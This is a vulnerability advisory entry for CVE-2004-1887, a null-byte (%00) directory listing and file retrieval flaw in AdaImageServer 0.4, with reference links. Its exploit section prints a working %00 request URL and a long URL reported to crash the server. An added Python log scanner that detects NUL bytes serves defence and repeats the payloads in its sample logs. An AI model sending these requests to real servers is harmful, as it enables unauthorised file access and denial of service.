ADA IMGSVR Remote Directory Listing Vulnerability

Vulnerability ID: 1107842
Vulnerability type: Input validation
Published: 2004-04-01
Updated: 2005-10-20
CVE ID: CVE-2004-1887
CNNVD-ID: CNNVD-200412-434
Platform: Windows
CVSS score: 5.0
|Vulnerability Source
https://www.exploit-db.com/exploits/23906
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-434
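|Vulnerability Details
A vulnerability exists in AdaImageServer (ImgSvr) version 0.4. An attacker can view directories or download files by means of an HTTP request with a trailing %00 (null).
|Exploit (EXP)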
source: http://www.securityfocus.com/bid/10027/info

A vulnerability has been reported in the ImgSvr server software that may allow a remote user to retrieve arbitrary files from the web server root directory and any subdirectories therein.

An attacker may leverage this issue to gain access to arbitrary scripts contained within the server root directory. 

http://www.example.org:1234/someDirectory/fileName%00

The following has been reported to crash the affected server:
http://127.0.0.1:1234/%00/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/
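
A defensive check for the request pattern described above, as an added example that is not part of the original advisory or of ImgSvr's code: it scans access-log lines for request paths that contain a NUL byte after percent-decoding. It goes slightly beyond the case on the page by decoding repeatedly, so a double-encoded `%2500` is caught too; the Common Log Format layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Request field of a Common Log Format line: "METHOD target HTTP/x.y" (assumed format)
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def decode_path(target: str, max_rounds: int = 3) -> bytes:
    """Percent-decode the path (query string dropped) until it stops changing."""
    path = target.split("?", 1)[0].encode("latin-1", "replace")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(path)
        if decoded == path:
            break
        path = decoded
    return path

def has_nul(target: str) -> bool:
    """True if the decoded request path contains a NUL byte (%00)."""
    return b"\x00" in decode_path(target)

def scan(lines):
    """Return (client, target) for each logged request whose path decodes to a NUL."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and has_nul(m.group("target")):
            hits.append((line.split(" ", 1)[0], m.group("target")))
    return hits

# Constructed sample log lines (not taken from a real server)
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Apr/2004:10:00:01 +0000] "GET /gallery/photo1.jpg HTTP/1.0" 200 5120',
    '192.0.2.44 - - [01/Apr/2004:10:00:07 +0000] "GET /someDirectory/fileName%00 HTTP/1.0" 200 812',
    '192.0.2.44 - - [01/Apr/2004:10:00:09 +0000] "GET /someDirectory/%2500 HTTP/1.0" 200 640',
    '192.0.2.10 - - [01/Apr/2004:10:00:12 +0000] "GET /gallery/100%25.jpg HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for client, target in scan(SAMPLE_LOG):
        print(f"NUL byte in request path from {client}: {target}")
```

The same `has_nul` check can be applied to incoming request paths before they reach any file-system call, rejecting the request instead of logging it.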
|References

Source: SECUNIA
Name: 11277
Link: http://secunia.com/advisories/11277
Source: XF
Name: imgsvr-obtain-information(15706)
Link: http://xforce.iss.net/xforce/xfdb/15706
Source: BID
Name: 10027
Link: http://www.securityfocus.com/bid/10027
Source: BID
Name: 10026
Link: http://www.securityfocus.com/bid/10026
Source: www.autistici.org
Link: http://www.autistici.org/fdonato/advisory/imgSvr0.4-adv.txt
Source: sourceforge.net
Link: http://sourceforge.net/project/shownotes.php?release_id=230023
Source: BUGTRAQ
Name: 20040401 Index viewing in imgSvr 0.4
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=108083813528255&w=2
